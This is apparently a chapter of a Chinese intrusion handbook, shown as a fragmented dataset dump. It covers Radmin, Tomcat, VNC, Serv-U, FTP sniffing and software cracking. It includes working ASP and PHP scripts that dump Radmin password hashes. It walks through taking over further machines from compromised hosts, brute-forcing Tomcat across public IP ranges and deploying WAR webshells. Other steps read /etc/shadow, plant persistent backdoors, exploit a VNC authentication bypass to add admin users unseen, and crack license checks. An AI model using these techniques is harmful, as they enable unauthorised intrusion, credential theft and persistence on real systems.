text
stringlengths
64
2.99M
在Radmin 2.x中,其参数设置信息均保存在注册表“HKEY_LOCAL_MACHINE\ SYSTEM\RAdmin\v2.0\Server\Parameters”键值下,如图7-82所示。 图7-82 Radmin 2.x版本参数在注册表中的保存位置 “Parameter”是默认密码保存值,“Port”是默认端口保存值。
Radmin安全密码信息的保存位置:HKEY_LOCAL_MACHINE\SOFTWARE\ Radmin\v3.0\ Server\Parameters\RadminSecurity\1。 Radmin安全密码信息的保存位置:HKEY_LOCAL_MACHINE\SOFTWARE\ Radmin\v3.0\Server\Parameters\NtUsers。
<% Set WSH= Server.CreateObject("WSCRIPT.SHELL") RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\" Parameter="Parameter" Port = "Port" path="LogFilePath" ParameterArray=WSH.REGREAD(RadminPath &amp; Parameter ) Response.write "The Result of Radmin Hash" Response.write "</br>" Response.write "" Response.write Parameter&amp;":" If IsArray(ParameterArray) Then For i = 0 To UBound(ParameterArray) If Len (hex(ParameterArray(i)))=1 Then strObj = strObj &amp; "0" &amp; CStr(Hex(ParameterArray(i))) Else strObj = strObj &amp; Hex(ParameterArray(i)) End If Next response.write Lcase(strobj) Response.write "</br>" Else response.write "Error! Can't Read!" End If Response.write "" IF Port<>"" then PortArray=WSH.REGREAD(RadminPath &amp; Port ) If IsArray(PortArray) Then Response.write Port &amp;":" Response.write hextointer(CStr(Hex(PortArray(1)))&amp;CStr(Hex(PortArray(0)))) Response.write "<br>" Else Response.write "Error! Can't Read!" End If else Response.write "Port is defualt 4899!" end if Rpath=WSH.REGREAD(RadminPath &amp; path ) Response.write"日志文件存储地址位:" Response.write Rpath Response.write "<br>" Function hextointer(strin) Dim i, j, k, result result = 0 For i = 1 To Len(strin) If Mid(strin, i, 1) = "f" or Mid(strin, i, 1) ="F" Then j = 15 End If If Mid(strin, i, 1) = "e" or Mid(strin, i, 1) = "E" Then j = 14 End If If Mid(strin, i, 1) = "d" or Mid(strin, i, 1) = "D" Then j = 13 End If If Mid(strin, i, 1) = "c" or Mid(strin, i, 1) = "C" Then j = 12 End If If Mid(strin, i, 1) = "b" or Mid(strin, i, 1) = "B" Then j = 11 End If If Mid(strin, i, 1) = "a" or Mid(strin, i, 1) = "A" Then j = 10 End If If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then j = CInt(Mid(strin, i, 1)) End If For k = 1 To Len(strin) - i j = j * 16 Next result = result + j Next hextointer = result End Function %> 直接访问该文件,即可读取Radmin的有关信息,如图7-83所示,获取了如下信息。
图7-83 获取Radmin的有关信息 (2)通过radmin.php获取 服务器可能会使用PHP脚本语言,那么使用radmin.asp文件就无法读取其相关信息了。 这时要想读取Radmin的信息,只要将以下代码保存为radmin.php文件即可,方法与保存radmin.asp文件类似,效果如图7- 84所示。 <?php $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host"); $rootkey = "HKEY_LOCAL_MACHINE\\SYSTEM\RAdmin\\v2.0\\Server\\Parameters\\"; $Parameter = "Parameter"; $Port = "Port"; $logpath = "LogFilePath"; $myparam = $shell->RegRead($rootkey.$Parameter); $myport = $shell->RegRead($rootkey.$Port); $path = $shell->RegRead($rootkey.$logpath); echo "radmin hash is:"; foreach($myparam as $a){ echo dechex($a); } echo "<br>"; echo "radmin port is :".hexdec(dechex($myport[1]).dechex($myport[0])). "<br>"; echo "radmin log path is:$path<br>"; echo "please clean the log" ?> 图7-84 通过radmin.php获取Radmin参数值 注意 (1)在使用radmin.asp或者radmin.php文件读取服务器中的Radmin参数信息时,有可能会由于权限问题而无法读取。 (2)radmin.asp和radmin.php文件只能用于读取Radmin服务端3.0以下版本,对于Radmin 3.0以上版本的读取无能为力。
Radmin 3.x系列是对Radmin 2.x系列的完全升级,注册表、安装程序位置及名称都进行了调整,在同一个系统中,可以同时安装Radmin 2.x和Radmin 3.x。
在Radmin 3.x中,其加密方式已经进行了变更,在Ntusers键值下的“1”中保存的值是80位,而在Radmin Security中其数值数据位数更多,达到1 170位,猜测其密码位数为1 024,而多余的位数则可能是用户名称等信息保存的位数。
将上面获取的Radmin 32位Hash值、IP地址和端口记下,打开Radmin-hash,新建一个IP地址连接,然后像使用正常的Radmin客户端管理器一样进行操作,如图7-86所示,输入获取的32位Hash值。
图7-86 使用使用Radmin-hash连接工具连接服务端 图7-87 通过Radmin-hash客户端管理服务端 7.8.6 利用Radmin口令进行内网渗透控制 Radmin作为一款强大的远程控制软件,深受管理员喜爱。
1.查看肉机上的Radmin客户端 在Radmin客户端中,如果需要连接服务端,则必须要建立一个连接,也就是需要一个IP地址和端口号,否则就不能使用。
图7-88 Radmin客户端中的服务端计算机 2.通过Radmin客户端建立连接 在Radmin客户端中新建一个连接,其IP地址设置为如图7-89所示的地址,端口选择其相应的端口。 例如,选择IP地址“192.168.0.15”,根据肉机上Radmin客户端的记录,该地址对应的端口(Port)为“5003”,然后选中“Connect through host”复选框,选择该肉机的Radmin地址。 该IP地址(肉机的IP地址)将作为内外网连接的桥梁,如果内网的计算机安装了Radmin服务端,只要拥有该内网计算机的Radmin控制口令,即可实施全面控制。 图7-89 通过肉机的Radmin地址连接内网 3.尝试建立连接 按照以上步骤,依次为肉机Radmin客户端中的内网Radmin服务端计算机创建连接,然后依次选择内网计算机进行连接尝试。 在本例中,选择IP地址为192.168.0.11的计算机,在Radmin客户端中选择“屏幕查看”选项,双击进行连接。 输入肉机的Radmin控制口令尝试连接,如果内网计算机安装了Radmin服务端,则需要输入密码2次,一次为肉机的Radmin的口令,一次是内网计算机的Radmin口令。
在本例中,可以看到该内网计算机为监控计算机,如图7-90所示。 图7-90 连接内网计算机 4.通过Telnet查看IP地址 在本例中,肉机有外网IP地址,也有内网IP地址,其内网IP地址为192.168.0.105。 当通过肉机连接内网的计算机时,在内网计算机上显示的网络连接为内网的IP地址。 “192.168.0.102”为内网中的一台计算机,该计算机上的Radmin服务端开放的端口为5000,在本地Radmin客户端选择“Telnet”选项,然后双击“192.168.0.102”选项,输入密码,进入Telnet管理界面,输入“netstat -an”命令查看网络连接,如图7-91所示,该网络连接中显示的Radmin连接为内网连接。
6.小结 本案例通过查看已经控制的肉机的Radmin客户端,对其内网的Radmin服务端进行口令尝试攻击,使用肉机的Radmin口令登录内网计算机上的Radmin服务端,一旦口令正确,则可以完全控制该内网计算机。
7.8.7 利用Radmin口令进行外网渗透控制 利用Radmin口令除了可以进行内网渗透,还可以进行外网渗透,其原理与内网渗透类似,下面通过实际操作进行讲解。
1.查看肉机上的Radmin客户端 依次单击“开始”→“程序”→“Remote Administrator v2.2”→“Radmin Viewer”选项,打开Radmin客户端,在其中可以看到一个“187”标签。 选择“187”标签,可以在Radmin客户端界面底部看到其对应的IP地址为“*.*.*182”,端口号为“2100”,控制模式为“Full Control”,如图7-92所示。 2.通过Radmin客户端建立连接并查看远端屏幕 在本地Radmin客户端中新建一个连接,其IP地址设置为“*.*.*182”,端口为“2100”。 在Radmin客户端中选择“屏幕监视”选项,输入得到的密码进行尝试,密码验证成功后,即可进入屏幕监视状态,查看远端计算机的屏幕了,如图7-93所示。 图7-92 Radmin客户端中的服务端计算机 图7-93 查看肉机屏幕 3.查看IP地址 在本地Radmin客户端中选中刚才的IP地址,选择“Telnet”选项,进入Telnet操作模式,输入“IPconfig /all”命令查看该计算机的网络配置情况,该计算机的IP地址为独立外网IP地址,如图7-94所示。 图7-94 查看计算机网络情况 技巧 在Radmin客户端连接状态下,如果是Radmin 3.0及以上版本,可以直接通过工具条上的小图标进行功能的切换,不需要每次输入Radmin控制密码。 4.通过Telnet查看外网情况 在本例中,该计算机的IP地址为外网IP地址,可以通过“net view”命令查看附近网络的情况。
图7-95 查看外网情况 5.再次实施外网渗透攻击 再次利用前面的步骤和获取的信息,依次查看网络中开放2100端口的计算机,用已经获取的Radmin口令测试该网络中的外网计算机,成功控制了3台计算机,其中一台为服务器,且疑似为交易服务器,如图7-96所示。 图7-96 再次实施内网渗透 技巧 在写作本案例时,笔者偶然看见以前的一幅截图,里面有18台计算机,均是通过Radmin进行管理的,如图7-97所示。
图7-97 通过Radmin管理网络 6.小结 本例通过查看已经控制的肉机的Radmin客户端,获取其管理员管理其他计算机时所用的Radmin服务端IP地址和端口,并通过获取的Radmin口令对管理员管理的Radmin服务端进行口令尝试攻击,口令正确率在50%左右(即使不正确,还可以通过键盘记录等手段嗅探或者记录管理员在计算机上的操作,从而获取更多的口令和控制更多的外网计算机)。
未知 7.9 通过扫描Tomcat口令渗透Linux服务器 对运行JSP服务器的渗透方法与其他脚本的渗透方法稍有不同,JSP网站一般需要通过WAR文件部署程序,对这类网站的渗透,可以通过暴力破解Tomcat用户密码及MySQL、Oracle数据库密码等方法获取WebShell。本节介绍的Apache Tomcat Crack软件对Tomcat服务器具有较好的暴力破解能力。 7.9.1 使用Apache Tomcat Crack暴力破解Tomcat口令 在起始IP地址中输入“216.84.0.1”,在终止IP地址中输入“216.120.0.1”,单击“添加”按钮,将该地址段添加到扫描地址段中,如图7-98所示,其他使用默认设置。 图7-98 暴力破解Tomcat口令 7.9.2 对扫描结果进行测试 在扫描结果中选择“http://216.86.144.162:8080/manager/html”,然后进行登录测试。如图7-99所示,单击“Tomcat Manager”选项进行登录测试,输入用户名和密码进行登录。 图7-99 对扫描结果进行测试 7.9.3 部署WAR格式的WebShell 进入Tomcat Manager管理后台后,到最下方进行WAR文件的部署。如图7-100所示,单击“浏览”按钮,选择一个WAR格式的WebShell,该WebShell必须是JSP的WebShell,WAR格式可以在压缩时将后缀自定义为“war”。 图7-100 部署WAR格式的WebShell 7.9.4 查看Web部署情况 文件上传成功后,Tomcat会自动部署WAR文件。如图7-101所示,可以看到,在后台多了一个“/Browser”超链接,单击该超链接即可进入部署的文件夹。部署成功后,可以对部署的JSP WebShell进行启用(Start)、停止(Stop)、重载(Reload)和卸载(Undeploy)操作。 图7-101 查看Web部署情况 7.9.5 获取WebShell 在部署时尽量将JSP文件命名为“index.jsp”,这样在部署成功后访问部署的链接即可,否则需要使用“部署文件夹+具体的WebShell名称”才能正确访问WebShell地址,如图7-102所示。 图7-102 获取WebShell 7.9.6 查看用户权限 在WebShell中单击“系统命令”选项,进入执行命令界面。如图7-103所示,在文本框中输入“id”,获取系统当前用户的权限等信息。 图7-103 获取当前用户信息 7.9.7 上传其他WebShell 通过获取的WebShell上传一个Jbrowser的WebShell。使用此WebShell浏览文件非常方便,如图7-104所示。 图7-104 上传WebShell 7.9.8 获取系统加密的用户密码 执行“cat /etc/shadow”命令,获取当前Linux系统中所有用户的加密密码值,如图7-105所示,该密码采用MD5加密,可以通过cmd5.com网站进行破解。 图7-105 获取系统用户密码加密值 7.9.9 获取root用户的历史操作记录 执行“cat /root/.bash_history”命令查看root用户的历史操作记录,只有具有root用户权限才能查看该历史记录文件,如图7-106所示。 图7-106 查看root用户的历史操作记录 7.9.10 查看网站域名情况 使用“www.yougetsignal.com”网站的反查IP域名功能,获取该IP地址的两个域名,分别是“communityaccesssystems.com”和“richardliggitt.com”,如图7-107所示,单击该域名查看域名能否正常访问。 图7-107 查看该网站域名情况 7.9.11 获取网站的真实路径 通过查看“/etc/passwd”文件中的网站用户获取网站的真实路径。通过WebShell定位网站的真实路径,如图7-108所示。在“/etc/passwd”文件中会指定单独的用户作为网站用户,同时会指定该用户的默认目录,该默认目录即为网站的真实路径。 图7-108 获取网站的真实路径 7.9.12 保留WebShell后门 找到网站的真实路径后,继续查看该文件夹下的文件和内容。如图7-109所示,该文件夹为“testphp”,即PHP的测试文件夹,上传一个网页木马或者在源代码中加入一句话后门。 图7-109 网站留后门 7.9.13 小结 本节介绍了如何通过Apache Tomcat Crack暴力破解Tomcat口令,只要知道用户的名称,就能通过字典对目标进行暴力破解。获取Tomcat管理员的用户名和密码后,可以通过WAR文件部署JSP的WebShell,如果设置不当,获取的WebShell权限即为root权限。
未知 7.10 VNC认证口令绕过漏洞攻击 RealVNC(简称VNC)有免费版、个人版及企业版3个版本,它与pcAnywhere远程控制软件的功能类似,也是一款世界知名的跨平台远程控制软件,其4.1.1以前的版本均存在RealVNC远程认证绕过漏洞。 RealVNC采用RFB(远程帧缓冲区)协议允许客户端与服务端协商合适的认证方法,但协议的实现上存在设计错误,远程攻击者可以绕过认证,无须口令实现对服务器的访问。由于其功能强大,因此深受入侵者和网络管理人员的喜爱,国外用户颇多。RealVNC分为客户端和服务器端,只要知道服务端的IP地址、服务开放端口及访问口令即可完全实施控制,其服务端的默认端口为5900。 本案例通过VNC漏洞利用工具直接扫描开放5900端口的计算机,该工具在扫描过程中可以自动识别RealVNC远程认证绕过漏洞,并将扫描结果保存在VNC_bypauth.txt文件中。通过本案例读者可以了解VNC密码验证绕过漏洞,学会如何利用VNC密码验证绕过漏洞利用工具软件溢出存在漏洞的计算机。 7.10.1 扫描开放5900端口的计算机 本案例使用VNC漏洞利用软件扫描开放5900端口的IP地址。在DOS或者DOSShell下输入“vnc”命令后,会给出使用帮助,其命令格式为“vnc -i IPaddress1- IPaddress2 -p 5900 -vnc”。 在本例中,对64.141.178.98-64.255.255.255网段进行扫描的命令为“vnc -i 64.141.178.98-64.255.255.255 -p 5900 -vnc”,如图7-110所示,输入命令后按“回车”键开始扫描。 图7-110 扫描开放5900端口的IP地址 说明 (1)如果是通过Radmin的Telnet来执行扫描命令,只要扫描命令开始运行,即使关掉Telnet也不会影响扫描。VNC会继续在肉机上进行扫描,扫描时会提示扫描的IP地址数、比例及扫描所花费的时间等,如图 7-111所示。 图7-111 扫描情况 (2)vnc.exe扫描完成以后会在当前扫描目录中生成扫描结果文件VNC_bypauth.txt,该文件会记录开放5900端口的IP地址及VNC的状态,如图7-112所示。VNC的状态有patched、banned及VULNERABLE 3种,只有VULNERABLE状态是可以利用的。 图7-112 5900端口的扫描结果 7.10.2 整理开放5900端口的IP地址 使用UltraEdit编辑器编辑VNC_bypauth.txt,过滤存在“:5900 vnc4:VULNERABLE”的IP地址,如图7-113所示。 图7-113 整理IP地址 技巧 使用UltraEdit的“替换”和“清除行后空格”功能可以快速整理扫描后的VNC_bypauth.txt文件。 7.10.3 整理扫描批处理命令 在扫描结果文件VNC_bypauth.txt中替换字符串“:5900 vnc4:VULNERABLE”,并去掉行尾的空格。使用UltraEdit的“块选”功能,在IP地址前面加入link命令,编辑完毕后将文件另存为59-vnc.txt,如图7-114所示。 图7-114 编辑VNC连接批处理命令 说明 在link命令与IP地址之间要留一个空格,否则执行命令时会出现错误。 7.10.4 使用VNC连接器Link进行连接 全部选中并复制59-vnc.txt文件中的所有内容,然后在DOS窗口单击右键,在弹出的快捷菜单中选择“粘贴”命令,执行VNC连接批处理命令,在DOS窗口中会弹出VNC连接成功、VNC连接失败或者要求重新连接的对话框,如图7-115所示。 图7-115 VNC连接结果 7.10.5 处理连接结果 在执行批处理时,由于IP地址限制等原因,可能存在无法正常连接VNC服务器的情况,有时可能需要输入密码。关闭无法连接或者需要密码进行连接的VNC服务端,保留可以直接查看的VNC服务端,如图7-116所示。 图7-116 处理连接结果 技巧 在处理连接的过程中,如果VNC服务端界面中计算机显示为锁定状态,该计算机就需要输入用户名和密码才能使用。不过,可以选中该连接,单击右键,在弹出的快捷菜单中选择“VNC Connection Info”命令,查看该连接的相关信息,等待管理员登录后,在计算机没有锁定时实施控制,如图7-117所示。 图7-117 查看连接信息 7.10.6 实施控制 选择一个屏幕没有锁定的VNC服务端,依次单击“start”→“run”命令,在其中输入“cmd”命令,打开DOS提示符窗口。依次执行添加用户、提升用户为管理员权限及查看管理员组用户命令,如图7-118所示。由于拥有系统安全控制权限,因此在该界面还可以上传木马程序并执行。 图7-118 执行控制命令 注意 使用VNC连接器进行连接时使用的是完全控制模式,因此应当选择用户不在计算机旁时执行命令和实施控制,否则容易被用户当场发现。执行命令时尽量使用批处理命令,执行完毕后可自动退出DOS提示符窗口。 7.10.7 小结 本案例通过扫描5900端口,整理开放并存在VNC密码验证绕过漏洞的IP地址,通过VNC Link直接连接。连接成功后,如果计算机处于未锁定状态或者未进行屏幕保护,则可以直接在该计算机上执行各种命令来实施完全控制。在连接前,可以使用sfind等工具软件对已经扫描出存在漏洞的计算机进行5900端口开放情况探测,仅对开放5900端口的IP地址进行连接,这样效率会更高。 虽然VNC漏洞已经出现了很长时间,但是通过扫描我们发现目前依然有很多VNC存在漏洞的计算机。在安全防护越来越严格的情况下,通过本案例的思路来获取肉机不失为一种好方法。
未知 7.11 Serv-U密码破解 Serv-U是一款流行的FTP服务器,很多Web服务器都是用Serv-U来提供FTP服务,供网站使用者或者设计者上传和下载文件的。Serv-U在Web渗透中经常遇到,在权限等合适的情况下,可以通过WebShell直接获得服务器权限。Serv-U的早期版本采用MD5加密,在获取Serv-U文件夹下的ServUDaemon.ini文件后,可以对FTP用户密码进行破解。Serv-U的加密算法如下。 01 随机产生2个字符。 02 将01步产生的字符串加上需要的密码一起进行MD5加密。 03 将01步中随机产生的2个字符和02步中产生的MD5编码的大写形式的字符组合在一起。 下面以一个实际案例介绍如何破解Serv-U的密码。 7.11.1 获取ServUDaemon.ini文件 Serv-U的安装目录一般位于C:\program files\Serv-U\下,也可能位于其他位置,安装路径由程序安装者决定。在获得WebShell权限的情况下,如果服务器上还安装了Serv-U,只要找到Serv-U的安装目录,将ServUDaemon.ini复制到本地留待后面进行破解即可,如图7-119所示。 图7-119 ServUDaemon.ini文件 7.11.2 查看ServUDaemon.ini文件 配置文件对大小写不敏感,行与行之间允许存在空行,主要分为[GLOBAL]全局变量段和[DOMAINS]域名配置段。[GLOBAL]全局变量段主要用于设置Serv-U的注册号及刷新标志。[DOMAINS]域名配置段中包括在Serv-U下添加的所有域信息及域以下的用户列表。 [GLOBAL] Version=5.0.0.0 #版本号,无须改动 RegistrationKey=HsVRCjxHMe/HwDOrrUxqeMuChKO0DdlzUy2tCGgcdMVQDs/7P9EdwjKr owsPF//h4YObIvknAH/FHA95cfEyb3wzQp2v7UfOzCFEFq722 #产品注册码,无须改动 ProcessID=1172 #注册号,无须改动 ReloadSettings=True #修改ini文件后必须加入此项,这时Serv-U会自动刷新配置文件并生效,此项随之消失。如果再 有修改,则再次添加 [DOMAINS] Domain1=0.0.0.0||21|Wizard Generated Domain|1|0|0 #无须改动,新增加的域的IP地址及说明,格式 #Domain1= IP地址 | 端口 | 域显示名称 | 是否生效 | 是否显示 | 是否删除 #IP地址为0.0.0.0时,Serv-U自动适配系统所分配的IP地址 #当生效位置0,则此域禁用 #当显示位置0,此域不生效并且在控制面板不显示此项 #当删除位置0,则ReloadSettings设置为“Ture”后,即刷新后,自动删除此域名以下的所有 内容 [Domain1] #无须改动,与上面添加的域对应,是此域内的一些公共设置 User1=admin|1|0 #必填,用户列表 #格式 #User序号 = 用户名 | 是否生效 | 是否删除 #User添加时必须按照序号排列:如果跳号,则跳号的不生效;如果序号重复,则排列在后的无效 #是否生效置0,则此用户禁用 #是否删除置1,则刷新后删除用户信息,包括配置;置2,则域下所有用户均删除 [USER=admin|1] #用户配置段,这些段的排列不分先后 TimeOut=600 Maintenance=System Note1="Administrator User" Access1=g:\|RWAMELCDP 在Serv-U密码破解中需要注意用户的配置,也就是ServUDaemon.ini文件中涉及用户的9个参数,一个用户对应一套参数配置,具体参数举例如下。 [USER=zt828|1]:表示用户为zt828。 password=mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37:表示FTP用户zt828的密码为“mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37”。 HomeDir=d:\wwwroot\zt828:表示默认主目录为d:\wwwroot\zt828。 MaxNrUsers=10:表示最大用户连接数为10个。 RelPaths=1:表示是否锁定用户到主目录,1表示锁定。 ChangePassword=1:表示是否可以修改密码,1表示可以。 DiskQuota=1|104857600|0:表示磁盘分配大小为100MB(100×1024×1024)。 SpeedLimitUp=102400:表示上传速度限制为100kb/s。 SpeedLimitDown=102400:表示下载速度限制为100kb/s。 Access1=d:\wwwroot\zt828|RL:表示读取和列表d:\wwwroot\zt828目录。 7.11.3 破解Serv-U密码 以上面的zt828用户配置为例,将密码“mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37”中的“mk”去掉,并将其复制到cmd5网站进行破解,如图7-120所示,密码可以被破解,但需要付费。单击“购买”按钮即可获得其查询的MD5值,如图7-121所示。 “7DC2A4B1A9A9E1F52A7F967FBCAA0A37”是采用MD5进行加密的,其密码为“mkok918918”,去掉“mk”后得到FTP的密码“ok918918”。 图7-120 通过cmd网站查询MD5密码 图7-121 获取破解后的密码 7.11.4 验证FTP 使用FTP的IP地址登录,输入用户名“zt828”和密码“ok918918”,即可成功登录FTP服务器。如图7-122所示,正常进入后可以查看网站的源代码、上传WebShell、获取数据库用户名和密码等。 图7-122 成功进入FTP服务器
未知 7.12 使用Cain嗅探FTP密码 使用Cain嗅探FTP密码适用于两种情况。一种情况是因为使用FTP软件时间较长而忘记了FTP的密码,又需要知道FTP的用户名和密码(FTP的用户名是明文,密码则是以多个“*”显示)。另一种情况是在安全检测过程中获取了某FTP完整软件,也就是说,该FTP软件中包含用户使用FTP的账号和密码等信息,只要将整个文件夹复制到本地或者将配置文件复制到本地即可使用。虽然可以通过软件的导入等功能将FTP的账号等信息导入本地FTP软件中使用,但还是不如自己弄个明白。随着FTP软件开发技术的提高,大部分FTP软件的新版本已经屏蔽了使用星号密码查看器查看FTP软件中的账号所对应的密码的机制,这个时候,就只能使用Cain获取FTP密码了。 7.12.1 安装Cain “Cain”的全称是“Cain & Abel”,最新版本为4.9.56,该公司的网址是http://www. oxid.it,用户可以到该公司的站点下载该软件。下载后按照正常软件的安装流程进行安装。安装结束后,程序会要求用户安装WinPcap抓包软件,安装完毕即可使用。 7.12.2 设置Cain 运行Cain软件,在菜单中选择“Configure”选项,将弹出“Configuration Dialog”对话框,如图7-123所示。在其中选择用于上网的网卡,然后勾选窗口下方的“Start Sniffer on start”和“Start ARP on start”复选框,最后单击“确定”按钮完成设置。 图7-123 设置Cain 7.12.3 开始监听 回到主界面后,如图7-124所示,单击主界面窗口左上角的网卡和圆形图形按钮开始监听。 图7-124 开始监听 7.12.4 运行FTP客户端软件 在肉机(本机)上运行FTP客户端软件,在本例中使用的是FlashFTP。运行FlashFTP后,依次连接站点中的FTP主机地址,如果用户名和密码正确,就会进入FTP服务器的相应目录。如图7-125所示,该服务器是一台文件服务器,其中有很多电影文件,下载速度比较快。 图7-125 运行FTP软件尝试连接 7.12.5 查看监听结果 在Cain的主界面上单击“Sniffer”标签,在下方单击“Passwords”标签,就会在表格中看到Cain的监听结果,如图7-126所示,FTP服务器地址、用户名及密码一目了然。 图7-126 查看监听结果 技巧 (1)先看Cain主界面的左边窗口,在密码下面即为Sniffer的结果。Sniffer的结果是一个树形结构,如果在“(0)”中显示的是监听结果,则本例中有监听结果的是“Ftp(4)”,表示监听到4个FTP密码记录。 (2)依次单击“View”→“Hide”选项,或者使用“Alt+Del”快捷键,可以隐藏Cain监听窗口,而且在计算机上看不到Cain的任何信息,由此即可达到隐藏的目的。 (3)Cain的监听结果会保存在Cain安装目录下对应的LST文件中。本例中监听到的是FTP密码,则结果会保存在ftp.lst文件中。打开该文件,如图7-127所示,可以看到FTP服务器地址、客户端地址、用户名和密码,按照大小进行排序,可以很方便地找出含有监听结果的LST 文件,将其复制到本地即可查看监听结果。 图7-127 文件中保存的监听结果 7.12.6 小结 Cain是一款强大的监听软件,除了密码监听外,还可以进行密码破解等。在入侵过程中,一旦知道对方使用CuteFTP、FlashXP等FTP客户端,则可以将其整个目录及配置文件复制到本地,通过在本地还原或者获取其密码获取更多的信息,甚至直接或者间接提升权限。这种方法虽然没有Serv-U提升权限那么直接,但是结合社会工程学进行木马捆绑诱骗,其效果还是不错的,所以一定要注意防范。
未知 7.13 利用Tomcat的用户名和密码构建后门 “JSP”是“Java Server Pages”的缩写,是由Sun公司倡导、许多公司共同参与建立的一种动态网页技术标准。 JSP技术是以Java作为脚本语言的,JSP网页为整个服务器端的Java库单元提供了一个接口为HTTP的应用程序服务。 在传统的网页HTML文件(*.htm、*.html)中加入Java程序片段和JSP标记,就构成了JSP网页(*.jsp)。 Web服务器在访问JSP网页的请求时,首先执行其中的程序片段,然后将执行结果以HTML格式返回给客户。
所有程序操作都在服务器端执行,通过网络传送给客户端的仅是得到的结果,对客户浏览器的要求最低,可以实现无插件、无ActiveX、无Java Applet甚至无框架。
这个包中的文件按一定目录结构来组织,通常其根目录下包含HTML和JSP文件(或者包含这两种文件的目录),另外还有一个WEB-INF目录(这个目录很重要)。 通常在WEB-INF目录下有一个web.xml文件和一个classes目录,web.xml是这个应用的配置文件,而classes目录下则包含编译好的Servlet类和JSP或Servlet所依赖的其他类(如JavaBean)。 这些所依赖的类一般也可以打包成JAR文件放到WEB-INF下的lib目录下,当然,也可以放到系统的CLASSPATH目录下,但那样做会给移植和管理带来很多不便。
7.13.1 检查Tomcat设置 服务器安装Apache Tomcat后,会默认开放8080端口供外部连接使用,一般在浏览器中输入“IP:8080”或者域名来访问Apache Tomcat页面,如图7-128所示。 图7-128 访问Apache Tomcat页面 7.13.2 查看Tomcat用户配置文件 Tomcat安装完成后有一个配置文件tomcat-users.xml,它位于Tomcat程序安装目录的conf目录下,直接打开该文件可以看到其中关于用户名和密码的明文值,如图7-129所示,找到并记住包含“admin,manager”行的用户名和密码。 图7-129 获取用户配置的用户名和密码 说明 (1)有很多对Tomcat不是很了解的管理员在安装Tomcat后没有修改默认密码(默认用户名是“admin”,密码为空),如果是这种情况可以直接登录。 (2)如果用户修改了该密码,那么其密码一定保存在tomcat-users.xml文件中,因此可以通过WebShell获取这个文件的内容。 7.13.3 进入Tomcat管理 Tomcat提供了在线管理功能,本案例也正是利用该功能来构建后门的。 如图7-128所示,单击页面左侧的“Tomcat Manager”超链接,会弹出一个要求输入用户名和密码的窗口。
图7-130 登录Tomcat管理应用 7.13.4 查看部署情况 输入从tomcat-users.xml文件中获取的具有管理员权限的用户名和密码,验证通过后进入部署管理页面,如图7-131所示。
图7-131 部署管理页面 说明 (1)在部署管理页面中可以“Start”(启动)、“Stop”(停止)、“Reload”(重载)、“Undeploy”(删除部署)已经部署的项目。
7.13.5 部署JSP WebShell后门程序 在部署管理页面的下方有一个“WAR file to deploy”设置区。 选择一个已经设置好的后门WAR文件(本例中的后门程序为job.war),将该文件部署到服务器上,如图7-132所示。 图7-132 将后门WAR文件上传到服务器 说明 (1)部署的文件必须是WAR文件。 (2)将WinZip软件安装在系统中,然后将单个或多个JSP后门文件压缩成一个文件,压缩成功后,将文件后缀从“.zip”更改为“.war”即可。
7.13.6 测试后门程序 在地址栏中输入“部署文件名称/JSP文件名”,如图7-133所示,在本例中是“http://127.0.0.1:8080/job/job.jsp”,如果设置正确会显示WebShell登录窗口。 图7-133 登录WebShell 7.13.7 在WebShell中执行命令 在WebShell中输入密码后,进入WebShell管理界面,默认显示服务器的一些信息。
平时可以在系统中保留一个小的后门程序,如果后门程序被杀毒软件查杀或者被管理员发现并删除,则可以通过以上步骤重新进行部署,从而永久保留后门。
由于笔者对JSP不是特别熟悉,不知道在JSP中是否可以进行诸如IIS中的严格的权限限制,以及能否禁止JSP WebShell的执行,因此,本案例只探讨服务器攻防——功能再强大的应用程序,也往往会因为存在一个微小的漏洞就被完全攻破。
未知 7.14 破解静态加密软件 一般来说,软件作者将软件编写完成后,出于对安全和利益的考虑,往往会对软件进行加密,以防止盗版和保护合法使用者的权益。
常见的注册码方式有“机器码+注册码”、“用户名+注册码”、“组合方式+注册码”。 其中最简单的就是早期固定字符串的软件注册,即设置一个固定的字符串,如果用户输入的字符串与指定的相符,则执行程序的正常功能,否则将提示用户退出或者重新输入注册码。
(4)网络验证 网络验证是指软件在注册时要在线连接官方网站进行注册,或者在注册后不定期地自动连接到官方网站进行正版校验,如果无法通过,则视为盗版或者试用版本。
(5)NAG窗口 在使用未注册版本或者试用版本的软件时,经常会弹出一些提示窗口,要求用户注册,这些窗口称为NAG窗口。 在软件试用期结束后,NAG窗口很可能会屏蔽软件的正式窗口或者某些重要的功能窗口,使软件不能被正常使用。
1.查壳 对软件破解来说,第一步往往是检查软件是否进行了加壳处理。 目前网上有很多可以用来查壳的软件,例如大名鼎鼎的PEiD等。 直接运行PEiD 0.93,选择需要查壳的文件,如果能够识别,会自动显示文件是采用什么方式进行加壳的。
图7-135 破解原文件 图7-136 查壳 2.脱壳 查出软件采用的加壳软件后,选择相应的脱壳软件进行脱壳。 笔者所采用的UPX脱壳软件需要进行安装,安装完成后会自动将一些与脱壳相关的操作加入文件的快捷菜单中。 需要脱壳时,选中文件,单击右键,依次选择“UPX ShellEx”→“UPX通用脱壳机”选项,软件将自动脱壳,如图7-137所示。
图7-137 脱壳 说明 有的软件可能采用多种方式加壳。 这种软件的脱壳,就需要一层一层进行。 脱壳成功后会给出一些提示,如图7-138所示。 图7-138 脱壳成功 3.反汇编 本案例使用W32Dasm进行反汇编。
W32Dasm是一款绿色的、功能非常强大的反汇编工具,最高版本为8.93,目前已经不再更新了。 一些爱好者根据需要对其进行了修改,出现了一些后续版本,本文使用的就是修改后的W32Dasm 10.0。 W32Dasm反汇编得到的源代码主要用于分析程序的一些基本信息、显示程序使用的各个寄存器段、区段、程序包含的对象及应用的函数等,如图7-139所示。 图7-139 使用W32Dasm反汇编源代码 图7-140 查找字符串 使用W32Dasm反汇编源代码后,可以查找一些字符串,这些字符串可能与注册有关。
在W32Dasm中依次选择“参考”→“串示数据参考”选项,在弹出的“W32Dasm串式参考内容清单”窗口拖动滚动条,查找“I am Sad!”字符串,如图7-140所示。
